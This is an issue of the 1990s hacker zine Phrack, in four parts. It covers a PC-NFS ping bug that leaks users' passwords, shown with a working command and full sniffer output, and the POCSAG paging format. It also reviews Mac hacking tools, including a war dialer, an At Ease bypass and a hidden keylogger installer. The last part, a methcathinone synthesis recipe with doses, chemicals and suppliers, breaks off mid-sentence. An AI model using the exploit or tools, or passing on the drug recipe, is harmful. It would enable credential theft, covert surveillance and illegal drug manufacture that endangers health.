| ==Phrack Magazine== |
|
|
| Volume Seven, Issue Forty-Eight, File 3 of 18 |
|
|
|
|
| // // /\ // ==== |
| // // //\\ // ==== |
| ==== // // \\/ ==== |
|
|
| /\ // // \\ // /=== ==== |
| //\\ // // // // \=\ ==== |
| // \\/ \\ // // ===/ ==== |
|
|
| Part I |
|
|
| ------------------------------------------------------------------------------ |
|
|
| PC-NFS Bug |
|
|
|
|
| I have found a nice little security hole in PC-NFS version 5.x. If you |
| ping a PC-NFS user with a packet size of between 1450 to 1480, the |
| PC's ICMP reply packet will divulge: |
|
|
| o The hostname of the PC |
| o The hostname of the PC's authentication server |
| o The username of the person logged in |
| o The password for the user (Thank you very much!) |
|
|
| All of this information is in clear text unless PC-NFS's NETLOGIN is |
| used. NETLOGIN uses XOR as its encryption, so this is hardly secure |
| either. |
|
|
| NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested |
| and all freely return the above information on both PC-NFS versions |
| 5.0 and 5.1a. This should work with other driver/NIC configurations |
| also. |
|
|
| You get the occasional added bonus of locking up the victims PC as |
| well! |
|
|
| This bug was new to Sun and they have created a new PCNFS.SYS |
| driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD. |
| This new version fills reply ICMP packets with nulls after 200 bytes of |
| the requested pattern. |
|
|
| Until you receive this patch from Sun, I would recommend setting all |
| external router interface MTU to a value of no greater than 1350 as this |
| is point where secrets are contained in the return packet. |
|
|
| The Unix command to generate the below results is as follows: |
|
|
| ping -s -c1 pchost.victim.com 1480 |
|
|
| Use your favorite sniffer to filter ICMP packets and you have it. If you |
| don't have a sniffer, try the -v(erbose) option of ping and convert the |
| hex to ascii starting around byte 1382. |
|
|
| Sniffer output follows: |
|
|
| 19:03:48.81 |
| ip: evil.com->pchost.victim.com |
| icmp: echo request |
| 62: 024 025 026 027 030 031 032 033 034 035 |
| 72: 036 037 ! " # $ % & ' |
| 82: ( ) * + , - . / 0 1 |
| 92: 2 3 4 5 6 7 8 9 : ; |
| 102: < = > ? @ A B C D E |
| 112: F G H I J K L M N O |
| 122: P Q R S T U V W X Y |
| 132: Z [ \ ] ^ _ ` a b c |
| 142: d e f g h i j k l m |
| 152: n o p q r s t u v w |
| 162: x y z { | } ~ 177 200 201 |
| 172: 202 203 204 205 206 207 210 211 212 213 |
| 182: 214 215 216 217 220 221 222 223 224 225 |
| 192: 226 227 230 231 232 233 234 235 236 237 |
| 202: 240 241 242 243 244 245 246 247 250 251 |
| 212: 252 253 254 255 256 257 260 261 262 263 |
| 222: 264 265 266 267 270 271 272 273 274 275 |
| 232: 276 277 300 301 302 303 304 305 306 307 |
| 242: 310 311 312 313 314 315 316 317 320 321 |
| 252: 322 323 324 325 326 327 330 331 332 333 |
| 262: 334 335 336 337 340 341 342 343 344 345 |
| 272: 346 347 350 351 352 353 354 355 356 357 |
| 282: 360 361 362 363 364 365 366 367 370 371 |
| 292: 372 373 374 375 376 377 000 001 002 003 |
| 302: 004 005 006 007 010 011 012 013 014 015 |
| 312: 016 017 020 021 022 023 024 025 026 027 |
| 322: 030 031 032 033 034 035 036 037 ! |
| 332: " # $ % & ' ( ) * + |
| 342: , - . / 0 1 2 3 4 5 |
| 352: 6 7 8 9 : ; < = > ? |
| 362: @ A B C D E F G H I |
| 372: J K L M N O P Q R S |
| 382: T U V W X Y Z [ \ ] |
| 392: ^ _ ` a b c d e f g |
| 402: h i j k l m n o p q |
| 412: r s t u v w x y z { |
| 422: | } ~ 177 200 201 202 203 204 205 |
| 432: 206 207 210 211 212 213 214 215 216 217 |
| 442: 220 221 222 223 224 225 226 227 230 231 |
| 452: 232 233 234 235 236 237 240 241 242 243 |
| 462: 244 245 246 247 250 251 252 253 254 255 |
| 472: 256 257 260 261 262 263 264 265 266 267 |
| 482: 270 271 272 273 274 275 276 277 300 301 |
| 492: 302 303 304 305 306 307 310 311 312 313 |
| 502: 314 315 316 317 320 321 322 323 324 325 |
| 512: 326 327 330 331 332 333 334 335 336 337 |
| 522: 340 341 342 343 344 345 346 347 350 351 |
| 532: 352 353 354 355 356 357 360 361 362 363 |
| 542: 364 365 366 367 370 371 372 373 374 375 |
| 552: 376 377 000 001 002 003 004 005 006 007 |
| 562: 010 011 012 013 014 015 016 017 020 021 |
| 572: 022 023 024 025 026 027 030 031 032 033 |
| 582: 034 035 036 037 ! " # $ % |
| 592: & ' ( ) * + , - . / |
| 602: 0 1 2 3 4 5 6 7 8 9 |
| 612: : ; < = > ? @ A B C |
| 622: D E F G H I J K L M |
| 632: N O P Q R S T U V W |
| 642: X Y Z [ \ ] ^ _ ` a |
| 652: b c d e f g h i j k |
| 662: l m n o p q r s t u |
| 672: v w x y z { | } ~ 177 |
| 682: 200 201 202 203 204 205 206 207 210 211 |
| 692: 212 213 214 215 216 217 220 221 222 223 |
| 702: 224 225 226 227 230 231 232 233 234 235 |
| 712: 236 237 240 241 242 243 244 245 246 247 |
| 722: 250 251 252 253 254 255 256 257 260 261 |
| 732: 262 263 264 265 266 267 270 271 272 273 |
| 742: 274 275 276 277 300 301 302 303 304 305 |
| 752: 306 307 310 311 312 313 314 315 316 317 |
| 762: 320 321 322 323 324 325 326 327 330 331 |
| 772: 332 333 334 335 336 337 340 341 342 343 |
| 782: 344 345 346 347 350 351 352 353 354 355 |
| 792: 356 357 360 361 362 363 364 365 366 367 |
| 802: 370 371 372 373 374 375 376 377 000 001 |
| 812: 002 003 004 005 006 007 010 011 012 013 |
| 822: 014 015 016 017 020 021 022 023 024 025 |
| 832: 026 027 030 031 032 033 034 035 036 037 |
| 842: ! " # $ % & ' ( ) |
| 852: * + , - . / 0 1 2 3 |
| 862: 4 5 6 7 8 9 : ; < = |
| 872: > ? @ A B C D E F G |
| 882: H I J K L M N O P Q |
| 892: R S T U V W X Y Z [ |
| 902: \ ] ^ _ ` a b c d e |
| 912: f g h i j k l m n o |
| 922: p q r s t u v w x y |
| 932: z { | } ~ 177 200 201 202 203 |
| 942: 204 205 206 207 210 211 212 213 214 215 |
| 952: 216 217 220 221 222 223 224 225 226 227 |
| 962: 230 231 232 233 234 235 236 237 240 241 |
| 972: 242 243 244 245 246 247 250 251 252 253 |
| 982: 254 255 256 257 260 261 262 263 264 265 |
| 992: 266 267 270 271 272 273 274 275 276 277 |
| 1002: 300 301 302 303 304 305 306 307 310 311 |
| 1012: 312 313 314 315 316 317 320 321 322 323 |
| 1022: 324 325 326 327 330 331 332 333 334 335 |
| 1032: 336 337 340 341 342 343 344 345 346 347 |
| 1042: 350 351 352 353 354 355 356 357 360 361 |
| 1052: 362 363 364 365 366 367 370 371 372 373 |
| 1062: 374 375 376 377 000 001 002 003 004 005 |
| 1072: 006 007 010 011 012 013 014 015 016 017 |
| 1082: 020 021 022 023 024 025 026 027 030 031 |
| 1092: 032 033 034 035 036 037 ! " # |
| 1102: $ % & ' ( ) * + , - |
| 1112: . / 0 1 2 3 4 5 6 7 |
| 1122: 8 9 : ; < = > ? @ A |
| 1132: B C D E F G H I J K |
| 1142: L M N O P Q R S T U |
| 1152: V W X Y Z [ \ ] ^ _ |
| 1162: ` a b c d e f g h i |
| 1172: j k l m n o p q r s |
| 1182: t u v w x y z { | } |
| 1192: ~ 177 200 201 202 203 204 205 206 207 |
| 1202: 210 211 212 213 214 215 216 217 220 221 |
| 1212: 222 223 224 225 226 227 230 231 232 233 |
| 1222: 234 235 236 237 240 241 242 243 244 245 |
| 1232: 246 247 250 251 252 253 254 255 256 257 |
| 1242: 260 261 262 263 264 265 266 267 270 271 |
| 1252: 272 273 274 275 276 277 300 301 302 303 |
| 1262: 304 305 306 307 310 311 312 313 314 315 |
| 1272: 316 317 320 321 322 323 324 325 326 327 |
| 1282: 330 331 332 333 334 335 336 337 340 341 |
| 1292: 342 343 344 345 346 347 350 351 352 353 |
| 1302: 354 355 356 357 360 361 362 363 364 365 |
| 1312: 366 367 370 371 372 373 374 375 376 377 |
| 1322: 000 001 002 003 004 005 006 007 010 011 |
| 1332: 012 013 014 015 016 017 020 021 022 023 |
| 1342: 024 025 026 027 030 031 032 033 034 035 |
| 1352: 036 037 ! " # $ % & ' |
| 1362: ( ) * + , - . / 0 1 |
| 1372: 2 3 4 5 6 7 8 9 : ; |
| 1382: < = > ? @ A B C D E |
| 1392: F G H I J K L M N O |
| 1402: P Q R S T U V W X Y |
| 1412: Z [ \ ] ^ _ ` a b c |
| 1422: d e f g h i j k l m |
| 1432: n o p q r s t u v w |
| 1442: x y z { | } ~ 177 200 201 |
| 1452: 202 203 204 205 206 207 210 211 212 213 |
| 1462: 214 215 216 217 220 221 222 223 224 225 |
| 1472: 226 227 230 231 232 233 234 235 236 237 |
| 1482: 240 241 242 243 244 245 246 247 250 251 |
|
|
| 19:03:48.85 |
| ip: pchost.victim.com->evil |
| icmp: echo reply |
| 62: 024 025 026 027 030 031 032 033 034 035 |
| 72: 036 037 ! " # $ % & ' |
| 82: ( ) * + , - . / 0 1 |
| 92: 2 3 4 5 6 7 8 9 : ; |
| 102: < = > ? @ A B C D E |
| 112: F G H I J K L M N O |
| 122: P Q R S T U V W X Y |
| 132: Z [ \ ] ^ _ ` a b c |
| 142: d e f g h i j k l m |
| 152: n o p q r s t u v w |
| 162: x y z { | } ~ 177 200 201 |
| 172: 202 203 204 205 206 207 210 211 212 213 |
| 182: 214 215 216 217 220 221 222 223 224 225 |
| 192: 226 227 230 231 232 233 234 235 236 237 |
| 202: 240 241 242 243 244 245 246 247 250 251 |
| 212: 252 253 254 255 256 257 260 261 262 263 |
| 222: 264 265 266 267 270 271 272 273 274 275 |
| 232: 276 277 300 301 302 303 304 305 306 307 |
| 242: 310 311 312 313 314 315 316 317 320 321 |
| 252: 322 323 324 325 000 000 324 005 ^ $ |
| 262: : 004 000 000 000 000 000 000 000 000 |
| 272: 036 006 W V P S Q R 016 007 |
| 282: 277 ^ $ 213 367 350 X p r c |
| 292: 212 E " < 000 u 005 350 V 003 |
| 302: 353 W < 005 u 005 350 W 002 353 |
| 312: N < 010 u 007 306 006 325 # 001 |
| 322: 353 H < 015 u 007 306 006 325 # |
| 332: 001 353 = < 017 u 007 306 006 325 |
| 342: # 001 353 2 < 022 u 005 350 021 |
| 352: 002 353 $ < 003 u 005 350 9 003 |
| 362: 353 033 < 022 w 017 2 344 213 360 |
| 372: 212 204 300 # P 350 225 305 X 353 |
| 382: 010 P 270 c 000 350 213 305 X 306 |
| 392: 006 205 347 000 Z Y [ X ^ _ |
| 402: 007 037 313 P S Q R U 036 006 |
| 412: W V 214 310 216 330 216 300 306 006 |
| 422: 325 # 000 373 277 ^ $ 273 A 347 |
| 432: 271 006 000 215 6 d $ 212 004 210 |
| 442: 005 212 007 210 004 F G C 342 363 |
| 452: 241 x $ 243 | $ 241 z $ 243 |
| 462: ~ $ 241 324 ) 243 x $ 241 326 |
| 472: ) 243 z $ 277 ^ $ 212 E " |
| 482: < 010 u 015 P 270 ` 000 350 $ |
| 492: 305 X 350 275 001 353 022 < 015 u |
| 502: 012 P 270 a 000 350 023 305 X 353 |
| 512: 004 < 017 u 003 350 017 000 306 006 |
| 522: 205 347 000 ^ _ 007 037 ] Z Y |
| 532: [ X 303 P 270 < 000 350 363 304 |
| 542: X 307 E $ 000 000 215 u " 213 |
| 552: M 020 206 351 203 351 024 367 301 001 |
| 562: 000 t 006 213 331 306 000 000 A 321 |
| 572: 371 350 , o 211 ] $ 307 E 030 |
| 582: 000 000 215 u 016 271 012 000 350 033 |
| 592: o 211 ] 030 213 E 020 206 340 005 |
| 602: 016 000 243 ` % 211 > b % 214 |
| 612: 016 d % 277 ^ % . 376 006 ? |
| 622: 020 350 9 276 . 376 016 ? 020 303 |
| 632: & 213 E 002 013 300 t 020 243 326 |
| 642: # & 213 ] 004 211 036 330 # 350 |
| 652: 231 m 353 0 200 > 324 ) 000 t |
| 662: 033 & 203 } 006 000 t 024 203 > |
| 672: 326 # 000 u 015 350 031 000 203 > |
| 682: 326 # 000 t 003 350 u m 241 326 |
| 692: # & 211 E 002 241 330 # & 211 |
| 702: E 004 303 & 213 M 006 006 V W |
| 712: 016 007 272 000 000 277 334 # 350 $ |
| 722: 000 241 323 # 243 350 X 203 > 326 |
| 732: # 000 u 023 366 006 343 015 001 u |
| 742: 014 203 > 350 X 000 u 353 272 001 |
| 752: 000 342 332 _ ^ 007 303 Q R W |
| 762: 203 372 000 u 021 203 > 030 214 000 |
| 772: t 012 276 004 214 271 003 000 363 245 |
| 782: 353 010 270 377 377 271 003 000 363 253 |
| 792: 276 A 347 271 003 000 363 245 _ 270 |
| 802: 377 377 211 E 036 211 E 241 324 |
| 812: ) 211 E 032 241 326 ) 211 E 034 |
| 822: 270 000 206 340 211 E 020 306 E |
| 832: 016 E 306 E 017 000 307 E 022 000 |
| 842: 000 307 E 024 000 000 306 E 026 002 |
| 852: 306 E 027 001 307 E 014 010 000 3 |
| 862: 300 306 E " 021 210 E # 211 E |
| 872: & 211 E ( 350 250 376 Z Y 303 |
| 882: 200 > 326 # 000 u 014 213 E * |
| 892: 243 326 # 213 E , 243 330 # P |
| 902: 270 V 000 350 205 303 X 303 P S |
| 912: Q R 213 E : 213 ] < 213 M |
| 922: & 213 U ( 350 223 k Z Y [ |
| 932: X P 270 \ 000 350 e 303 X 303 |
| 942: 306 E " 000 P 270 X 000 350 X |
| 952: 303 X 303 & 213 E 002 & 213 ] |
| 962: 004 & 213 U 006 006 W 016 007 350 |
| 972: Y i s 003 351 227 000 277 334 # |
| 982: W 271 003 000 363 245 276 A 347 271 |
| 992: 003 000 363 245 _ 211 E 036 211 ] |
| 1002: 241 324 ) 211 E 032 241 326 ) |
| 1012: 211 E 034 270 000 206 340 211 E |
| 1022: 020 306 E 016 E 306 E 017 000 307 |
| 1032: E 022 000 000 307 E 024 000 000 306 |
| 1042: E 026 377 306 E 027 001 307 E 014 |
| 1052: 010 000 3 300 306 E " 010 210 E |
| 1062: # 211 E & 377 006 h % 241 h |
| 1072: % 211 E ( 211 026 350 X 211 026 |
| 1082: l % 307 006 j % 000 000 350 322 |
| 1092: 375 203 > 350 X 000 t # 366 006 |
| 1102: 343 015 001 u ! 203 > j % 000 |
| 1112: t 353 203 > j % 001 u 011 241 |
| 1122: l % + 006 350 X 353 015 270 375 |
| 1132: 377 353 010 270 376 377 353 003 270 377 |
| 1142: 377 307 006 l % 000 000 _ 007 & |
| 1152: 211 E 010 303 P 270 ^ 000 350 206 |
| 1162: 302 X 203 > l % 000 t 017 213 |
| 1172: ] ( ; 036 h % u 006 307 006 |
| 1182: j % 001 000 303 P 270 ; 000 350 |
| 1192: g 302 X 203 > l % 000 t 006 |
| 1202: 307 006 j % 002 000 303 000 000 000 |
| 1212: 000 000 000 000 000 000 000 000 000 000 |
| 1222: 000 000 000 000 000 000 000 000 000 000 |
| 1232: 000 000 000 000 000 000 000 000 000 000 |
| 1242: 000 000 000 000 000 000 000 000 002 000 |
| 1252: 000 000 300 A 000 000 034 000 000 000 |
| 1262: 200 000 000 000 k 000 000 000 000 016 |
| 1272: 000 000 000 000 000 000 000 000 000 |
| 1282: 010 000 000 000 252 001 000 000 010 5 |
| 1292: 000 000 r 027 301 . 000 000 000 000 |
| 1302: 036 F 300 . 000 000 000 000 036 F |
| 1312: 300 . 000 000 000 000 000 000 000 000 |
| 1322: 000 000 000 000 000 000 000 000 000 000 |
| 1332: 000 000 000 000 000 000 000 000 000 000 |
| 1342: 000 000 000 000 000 000 000 000 000 |
| 1352: 000 000 000 002 000 000 200 366 = 000 |
| 1362: { 255 023 000 242 265 015 000 002 000 |
| 1372: 000 000 S 017 005 000 C 003 000 000 |
| 1382: p c h o s t 000 000 000 000 |
| 1392: 000 000 000 000 000 000 244 A @ - |
| 1402: s e r v e r 1 000 000 000 |
| 1412: 000 000 000 000 000 000 244 A @ 001 |
| 1422: 000 000 000 000 000 000 000 000 000 000 |
| 1432: 000 000 000 000 000 000 244 A @ 001 |
| 1442: u s e r n a m e 000 000 |
| 1452: p a s s w d 000 000 000 000 |
| 1462: 000 000 000 000 000 000 000 000 000 000 |
| 1472: 000 000 000 000 000 000 000 000 000 000 |
| 1482: 000 000 200 000 k 000 260 271 377 377 |
| 1492: 344 275 9 212 |
|
|
| The names have been changed to protect the innocent, but the rest is actual. |
|
|
| Byte 1382: PC's hostname |
| Byte 1402: PC's Authentication server hostname |
| Byte 1382: The user's account name. Shows nobody if logged out. |
| Byte 1382: The user's password. |
|
|
| ------------------------------------------------------------------------------ |
|
|
| POCSAG paging format, code and code capacity |
|
|
| The POCSAG (Post Office Code Standardization Advisory Group) code is a |
| synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH |
| structure. The POCSAG codes provides improved battery-saving capability and an |
| increased code capacity. |
| The POCSAG code format consists of a preamble and one or more batches of |
| codewords. Each batch comprises a 32-bit frame synchronization code and eight |
| 64-bit address frames of two 32-bit addresses or idle codewords each. The |
| frame synchronization code marks the start of the batch of codewords. |
|
|
| -PREAMBLE STRUCTURE |
| The preamble consists of 576 bits of an alternating 101010 pattern transmitted |
| at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to |
| determine if the data received is a POCSAG signal and for synchronization with |
| the stream of data. |
|
|
| |---Preamble----|-----------First Batch-------------|--Subsec. Batch--| |
|
|
| ______________________________________________________< <____________ |
| paging | 576 bits of | | | | | | | | | | | > > | |
| format | reversals |F| | | | | | | | | | | | | | | | |F| | |
| | (101010, etc) |S| | | | | | | | | | | | | | | | |S| | |
| |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________| |
| > > |
| 1 FRAME = 2 CODEWORDS |
|
|
| Preamble Batchs |
|
|
| 512 BPS 1125 mS 1062.5 mS |
|
|
| 1200 BPS 480 mS 453.3 mS |
|
|
| CodeWords Structure |
| ____________________________________________________________________ |
| BIT | | | | | | |
| NUMBER | 1 | 2 to 19 | 20,21 | 22 to 31 | 32 | |
| |___|______________|_______|_______________________|_________________| |
| ____________________________________________________________________ |
| ADDRESS| | | | | | |
| FORMAT | 0 | Address Bits | S I B | Parity Check Bits | Even parity | |
| |___|______________|_______|_______________________|_________________| |
| ^ |
| Source identifier bits |
| ____________________________________________________________________ |
| MESSAGE| | | | | |
| FORMAT | 1 | Message Bits | Parity Check Bits | Even parity | |
| |___|______________________|_______________________|_________________| |
|
|
| -BATCH STRUCTURE |
| A batch consist of frame synchronization code follow by 8 frames of two address |
| codewords per frame (16 address codewords per batch). In order to maintain the |
| proper batch structure, each frame is filled with two address codewords, or two |
| idle codewords, or two message codewords, or any appropriate combination of the |
| three codewords types. |
|
|
| -FRAME SYNCHRONIZATION CODE STRUCTURE |
| The frame synchronization (FS) code is a unique, reserved word that is used to |
| identify the beginning of each batch. The FS code comprises the 32 bits: |
|
|
| 011111100110100100001010111011000. |
|
|
| -OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS |
| An alternate frame synchronization (AFS) code can be selected to support special |
| systems or systems that require increased coding capability. The AFS is |
| generated in the same manner as an address codeword (i.e., BCH codeword with |
| parity bits). The POCSAG signaling standard has reserved special codewords for |
| the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging |
| system to support the AFS. The AFS will change to frame 0 on the programmer |
| since no frame information is included in the AFS. The AFS should use address |
| 1 so that bit 20 and 21 are 0. |
|
|
| -ADDRESS CODEWORD STRUCTURE |
| An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are |
| the address bits. The pagers looks at these bits to find its own unique |
| address. Each POCSAG codeword is capable of providing address information for |
| four different paging sources (Address 1 to 4). These address are determined |
| by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits |
| 22 through 31 are the parity check bits, and bit 32 is the even parity bit. |
|
|
|
|
| BIT 20 BIT 21 |
| Address 1 0 0 |
| Address 2 0 1 |
| Address 3 1 0 |
| Address 4 1 1 |
|
|
| Pre-coded into the code plug are three bits which designate the frame location, |
| within each batch, at which the pager's address is to be received; the decoder |
| will look at the codewords in this frame for its address. |
| Power is removed from the receiver during all frames other than the precoded |
| one, thus extending pager battery life. |
|
|
| -CODE CAPACITY |
| The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres |
| s |
| bits are the most-significant bits. |
|
|
| -MESSAGE CODEWORD STRUCTURE |
| A message codeword structure always start with a 1 in bit 1 and always follows |
| directly after the address. Each message codeword replaces an address codeword |
| in the batch. |
|
|
| -IDLE CODEWORD STRUCTURE |
| The idle codeword is unique, reserved codeword used to talk place of an address |
| in any frame that would not otherwise be filled with 64 bits. |
| Thus, if a frame contains only an address, an idle codeword comprises the 32 |
| bits: |
|
|
| 01111010100010011100000110010111 |
|
|
| -POCSAG CHARACTERS |
|
|
| CHAR HEX | CHAR HEX | CHAR HEX | |
| | | | |
| # 23 | $ 24 | @ 40 | |
| [ 5B | \ 5C | ] 5D | |
| ^ 5E | _ 5F | ' 60 | |
| { 7B | | 7C | } 7D | |
| ~ 7E | DEL 7F | SP 20 | |
|
|
| ------------------------------------------------------------------------------ |
|
|
| MACINTOSH HACKING |
| by Logik Bomb |
|
|
| "My fellow astronauts..." |
| -Dan Quayle |
|
|
| Now, two people have mailed Erik Bloodaxe asking about Macintosh |
| hacking particularly war dialers, and each time he insulted Macs and tried |
| to get someone to write a file on it. No one has done it. So I guess I have |
| to. |
| First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the |
| originators of the Apple and the Macintosh were busted for phreaking in |
| college. The Apple IIe was used almost universally by hackers. So why has |
| the Mac fallen out of favor for hacking? Simple. Because it fell out of |
| favor for everything else. Apple screwed up and wouldn't let clone makers |
| license the MacOS. As a result, 80% of personal computers run DOS, and |
| Macintoshes are left in the minority. Second, DOS compatible users, and |
| hackers in particular, have an image of Mac users as a bunch of whiny |
| lamers who paid too much for a computer and as a result are constantly |
| defensive. The solution to this impression is to not be an asshole. I know |
| it drives every Mac user crazy when he reads some article about Windows |
| 95's brand new, advanced features such as "plug-and-play" that the |
| Macintosh has had since 1984. But just try and take it. If it's any |
| consolation, a lot of IBM-compatible (a huge misnomer, by the way) users |
| hate Windows too. |
| Now, on with the software. |
| ------------------------- |
| Assault Dialer 1.5 |
| Assault Dialer, by Crush Commando, is the premier Mac war dialer, |
| the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we |
| have right now. It is the successor to a previous war dialer known as Holy |
| War Dialer 2.0. The only real competitor I've heard of for Assault Dialer |
| is Tyrxis Shockwave 2.0, but the only version I could get a hold of was |
| 1.0, and it wasn't as good as Assault Dialer, so that's your best bet right |
| now. |
|
|
| MacPGP 2.6.2 and PGPfone 1.0b4 |
| MacPGP is the Macintosh port of the infamous PGP (Pretty Good |
| Privacy.) This file is not about cryptography, so if you want to know about |
| PGP read the fuckin' read me and docs that come with the file. Strangely |
| enough, however, Phil Zimmerman released PGPfone, a utility for encrypting |
| your phone and making it a secure line, for the Mac _first._ I don't know |
| why, and I haven't had a chance to test it, but the idea's pretty cool. If |
| PGP doesn't get Zimmerman thrown in jail, this will. |
|
|
| DisEase 1.0 and DisEase 3.0 |
| Schools and concerned parents have always had a problem. Schools |
| can't have students deleting the hard drive, and parents don't want their |
| kids looking at the kinky pictures they downloaded. So Apple came out with |
| At Ease, an operating system that runs over System 7, sort of the same way |
| Windows runs off of DOS. However, I can't stand At Ease. Everything about |
| it, from the Fisher-Price screen to the interface drives me crazy. It |
| drives a lot of other people crazy too. So it was just a matter of time |
| before someone made a program to override it. The first was DisEase 1.0, a |
| small program by someone calling himself Omletman, that would override At |
| Ease if you put in a floppy loaded with it and clicked six times. Omletman |
| improved this design and eventually released 3.0. (I haven't been able to |
| find any evidence that a 2.0 was ever released) 3.0 has such cool features |
| as reading the preferences file to give you the password, so you can change |
| the obnoxious greeting teachers always put to something more sinister. The |
| only problem with 3.0 is that some configurations of At Ease only let |
| documents be read off of disks; no applications, which means DisEase 3.0 |
| won't appear, and so you can't run it. However, with 1.0 you don't have to |
| actually open the application, you just click six times, so if you use 1.0 |
| to get to the finder, and then 3.0 to read the passwords, things will work. |
|
|
| Invisible Oasis Installer |
| Oasis is a keystroke recorder, so you can find out passwords. |
| However, with the original Oasis, you had to put it in the Extensions |
| folder and make it invisible with ResEdit, which takes a while. Invisible |
| Oasis Installer, however, installs it where it should be and automatically |
| makes it invisible. |
| "So everything's wrapped up in a nice neat little _package_, then?" |
| -Homer Simpson |
|
|
| Anonymity 2.0 and Repersonalize 1.0 |
| Anonymity, version 1.2, was a rather old program whose author has |
| long been forgotten that was the best data fork alterer available. It |
| removed the personalization to programs. However, in around 1990 someone |
| named the Doctor made 2.0, a version with some improvements. Repersonalize |
| was made in 1988 (God, Mac hacking programs are old) which reset |
| personalization on some of the Microsoft and Claris programs, so you could |
| enter a different personalization name. I don't know if it will still work |
| on Microsoft Word 6.0.1 and versions of programs released recently, but I |
| don't really care because I use Word 5.1a and I'm probably not going to |
| upgrade for a while. |
|
|
| Phoney (AKA Phoney4Mac) |
| Phoney is an excellent program that emulates the Blue Box, Red Box, |
| Black Box and Green Box tones. There is also Phoney4Newton, which does the |
| same thing on the most portable of computers, the Newton. |
|
|
| That's all I'm covering in this file as far as Mac hacking |
| programs. You'll probably want to know where to find all this crap, so here |
| are all of the Mac hacking ftp and Web sites I know of: |
| Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html) |
| This site, run by Space Rogue is L0pht Heavy Industries' Mac site. |
| It is probably the largest and best archive of Mac hacking software |
| connected to the Internet. The problem with this is that it can't handle |
| more than two anonymous users, meaning that unless you pay to be part of |
| L0pht, you will never get into this archive. I've tried getting up at 4:30 |
| AM, thinking that no one in their right mind would possibly be awake at |
| this time, but there is always, somehow, somewhere, two people in Iceland |
| or Singapore or somewhere on this site. |
| The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html) |
| This site does not look like much, and it is fairly obvious that |
| its maintainer, Sean Warren, is still learning HTML, but it is reliable and |
| is a good archive. It is still growing, probably due to the fact that it is |
| one of the only Internet Mac hacking sites anyone can get to and upload. |
| Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html) |
| This is an excellent site and has many good programs. There is one |
| catch, however. It's maintainer, Ole Buzzard, is actually getting the files |
| from his BBS. So many of the really good files are locked away in the k0p |
| BBS, and those of us who can't pay long distance can't get the files. Oh |
| well. |
| Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page |
| (http://www.lib.iup.edu/~seaman/index.html) |
| While this is hardly a Macintosh hacking site, it's just a hacking |
| site, it does have very few Mac files, some of which are hard to get to. |
| However, Bone might get expelled because of a long story involving AOHell, |
| so this page might not be here. Then again, maybe Bone won't get expelled |
| and this site will stay. Never can tell 'bout the future, can you? |
| "We predict the future. We invent it." |
| -Nasty government guy on the season premiere of _The X-Files_ |
|
|
| Andy Ryder |
| Netsurfer and Road Warrior on the Info Highway |
| I've pestered Bruce Sterling _and_ R.U. Sirius! |
| As mentioned in the alt.devilbunnies FAQ, part I (Look it up!) |
| Once scored 29,013,920 points on Missile Command |
|
|
| "This Snow Crash thing- is it a virus, a drug, or a religion?" |
| -Hiro Protagonist |
| "What's the difference?" |
| -Juanita Marquez |
|
|
| "...one person's 'cyberpunk' is another's everyday obnoxious teenager with |
| some technical skill thrown in..." |
| -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List" |
| "More than _some_ technical skill." |
| -Andy Ryder |
|
|
| ------------------------------------------------------------------------------ |
|
|
|
|
| Making Methcathinone |
|
|
| Compiled |
|
|
| by Anonymous |
|
|
|
|
| Ok, this has got to be the easiest drug made at home (by far). This is very |
| similar to methamphetamine in structure, effect, and use. Typical doses |
| start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add |
| 10 mg) or through mucous membranes (nasally). |
|
|
| Ingredients: |
| Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine. |
| Potassium chromate, or dichromate (easily gotten from chem lab. orange/red) |
| Conc. Sulfuric acid - it's up to you where you get this. Contact me if you |
| need help locating it. |
| Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it |
| is used for cleaning concrete. |
| Sodium Hydroxide - Hardware stores. AKA lye. |
| Toluene - Hardware store, paint store. |
|
|
| Lab equipment: |
| 1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00) |
| 125 mL separatory funnel - same as above |
| glass tubing - same as above |
|
|
| Buchner funnel - This is a hard to find item, but must schools have at least |
| one. They are usually white porcelain or plastic. They look |
| like a funnel with a flat disk in the bottom with lots of |
| holes in it. If you need one, arrangements can be made. |
| Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00 |
|
|
| References to Edmund's Scientific Co, in NJ, are accurate. You have to go |
| to their "Lab Surplus/Mad Scientist" room. The prices are incredible. |
| This place is definitely a recommended stopping sight for anybody going |
| through New Jersey. It is located in "Barrington", about 30 minutes from |
| center city Philadelphia. |
| All of the above can be purchased from "The Al-Chymist". Their number is |
| (619)948-4150. Their address is: 17525 Alder #49 |
| Hesperia, Ca 92345 |
| Call and ask for a catalog. |
|
|
| That's it. The body of this article is stolen from the third edition of |
| "Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried |
| and proven method by many people. If you want a copy of this book, contact |
| me. |
|
|
| Good luck and keep away from the DEA |
|
|
|
|
| M E T H C A T H I N O N E |
|
|
| K I T C H E N I M P R O V I E S E D C R A N K |
|
|
|
|
| The latest designer variant upon the amphetamine molecule to gain |
| popularity and publicity is methcathinone, commonly called cat. This |
| substance is remarkably similar to the active ingredient found in the |
| leaves of the khat tree which the loyal drug warriors on the network news |
| blame for turning peace loving Somalis into murderous psychopaths. The |
| active ingredient in the khat leaves is cathinone, which has the same |
| structural relationship to methcathinone that amphetamine has to |
| methamphetamine. It is made by oxidizing ephedrine, while meth can be |
